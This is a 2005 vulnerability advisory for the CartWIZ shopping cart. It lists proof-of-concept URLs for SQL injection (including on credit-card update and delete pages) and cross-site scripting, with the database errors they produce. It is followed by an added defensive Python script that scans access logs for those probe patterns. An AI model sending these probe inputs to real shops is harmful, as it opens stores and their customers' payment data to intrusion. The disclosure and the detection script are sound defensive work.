Dcrab's Security Advisory
http://www.dbtech.org
Deadbolt Computer Technologies

******************************
SPECIAL BIRTHDAY RELEASE, 18TH BIRTHDAY RELEASE FOR DIABOLIC CRAB, YOU CAN SEND EMAILS TO DCRAB@HACKERSCENTER.COM
******************************

Get Dcrab's Services to audit your Web servers, scripts, networks, etc., or even code them. Learn more at http://www.dbtech.org

Severity: High
Title: [Bday Release] CartWIZ shopping cart has multiple SQL injection and Cross Site Scripting vulnerabilities
Date: 8/07/2005
Vendor: CartWIZ
Vendor Website: http://www.cartwiz.com/
Vendor Status: Contacted but no reply

Summary: There are multiple SQL injection and cross site scripting vulnerabilities in CartWIZ Shopping Cart.

Proof of Concept Exploits:

www.site.com/cartwiz/store/tellAFriend.asp?idProduct='
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
/cartwiz/store/tellAFriend.asp, line 71

www.site.com/cartwiz/store/viewSupportTickets.asp?sortType='&sortOrder=ticketNum&page=0
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
www.site.com/cartwiz/store/viewSupportTickets.asp, line 149

www.site.com/cartwiz/store/updateCreditCards.asp?id='
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' and idCustomer=1'.
/cartwiz/store/updateCreditCards.asp, line 31

www.site.com/cartwiz/store/deleteCreditCards.asp?id='
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
www.site.com/cartwiz/store/deleteCreditCards.asp, line 27

www.site.com/cartWiz/store/login.asp?message=>&redirect=%2FcartWiz%2Fstore%2FmyAccount%2Easp
Cross Site Scripting

Keep yourself updated, RSS feed at: http://digitalparadox.org/rss.ah and at http://www.hackerscenter.com

Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://www.dbtech.org/. Look out for my soon to come out book on Secure coding with PHP.

--------------------------------------------------------------------------------
Sincerely,
Diabolic Crab
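For an operator who runs this cart and wants to know whether the endpoints listed above are being probed, the following script (an added example, not part of the original advisory or of CartWIZ) scans IIS-style access log lines for the exact markers the proof-of-concept URLs rely on: a single quote in the injectable parameters and angle brackets in the login.asp message parameter. The log format, the sample lines and the client addresses are constructed for the example and assume a W3C layout of date, time, client IP, method, URI stem, URI query and status; a 500 status next to a quoted parameter is the strong signal, since the ODBC error quoted in the advisory surfaces as a server error.

```python
"""Scan access-log lines for probes against the CartWIZ endpoints named in the
advisory. Added example for defenders; the log format below is assumed and the
sample lines are constructed."""
from collections import namedtuple
from urllib.parse import parse_qs

# Endpoints and parameters taken from the advisory. Keys are lowercased because
# IIS paths and ASP query-string names are matched case-insensitively
# (the advisory itself mixes /cartwiz/ and /cartWiz/).
WATCHED = {
    "/cartwiz/store/tellafriend.asp": {"idproduct": "sqli"},
    "/cartwiz/store/viewsupporttickets.asp": {"sorttype": "sqli"},
    "/cartwiz/store/updatecreditcards.asp": {"id": "sqli"},
    "/cartwiz/store/deletecreditcards.asp": {"id": "sqli"},
    "/cartwiz/store/login.asp": {"message": "xss"},
}

Finding = namedtuple("Finding", "client_ip path param kind status")

# Constructed sample log lines (W3C-style: date time c-ip method stem query status).
LOG_LINES = [
    "2005-07-08 10:00:01 192.0.2.10 GET /cartwiz/store/tellAFriend.asp idProduct=17 200",
    "2005-07-08 10:00:05 192.0.2.10 GET /cartwiz/store/tellAFriend.asp idProduct=%27 500",
    "2005-07-08 10:00:09 192.0.2.10 GET /cartwiz/store/viewSupportTickets.asp "
    "sortType=%27&sortOrder=ticketNum&page=0 500",
    "2005-07-08 10:00:12 192.0.2.11 GET /cartWiz/store/login.asp "
    "message=%3E&redirect=%2FcartWiz%2Fstore%2FmyAccount%2Easp 200",
    "2005-07-08 10:00:15 192.0.2.12 GET /cartwiz/store/index.asp - 200",
]


def suspicious(value, kind):
    """True if the decoded parameter value carries the marker the PoC depends on:
    an unbalanced quote for the SQL injection cases, angle brackets for the XSS case."""
    if kind == "sqli":
        return "'" in value
    if kind == "xss":
        return "<" in value or ">" in value
    return False


def scan_line(line):
    """Parse one log line and return the findings for it (possibly none)."""
    fields = line.split()
    if len(fields) < 7:
        return []                      # malformed or truncated line, skip it
    client_ip, path, query = fields[2], fields[4].lower(), fields[5]
    status = int(fields[6]) if fields[6].isdigit() else 0
    params = WATCHED.get(path)
    if not params or query == "-":     # not a watched endpoint, or no query string
        return []
    # parse_qs percent-decodes values, so %27 and %3E become ' and >.
    decoded = parse_qs(query, keep_blank_values=True)
    hits = []
    for name, values in decoded.items():
        kind = params.get(name.lower())
        if kind and any(suspicious(v, kind) for v in values):
            hits.append(Finding(client_ip, path, name.lower(), kind, status))
    return hits


def scan_log(lines):
    """Return all findings across the given log lines, in log order."""
    return [hit for line in lines for hit in scan_line(line)]


def probing_clients(findings):
    """Distinct client addresses that produced at least one finding."""
    return sorted({f.client_ip for f in findings})


if __name__ == "__main__":
    for finding in scan_log(LOG_LINES):
        print(finding)
    print("clients:", probing_clients(scan_log(LOG_LINES)))
```

Only the parameters the advisory names are checked, so a request that uses the other parameters on the same page legitimately (sortOrder, page, redirect) does not raise a finding; widen WATCHED once the vendor's own input handling has been reviewed rather than flagging every quote on the site.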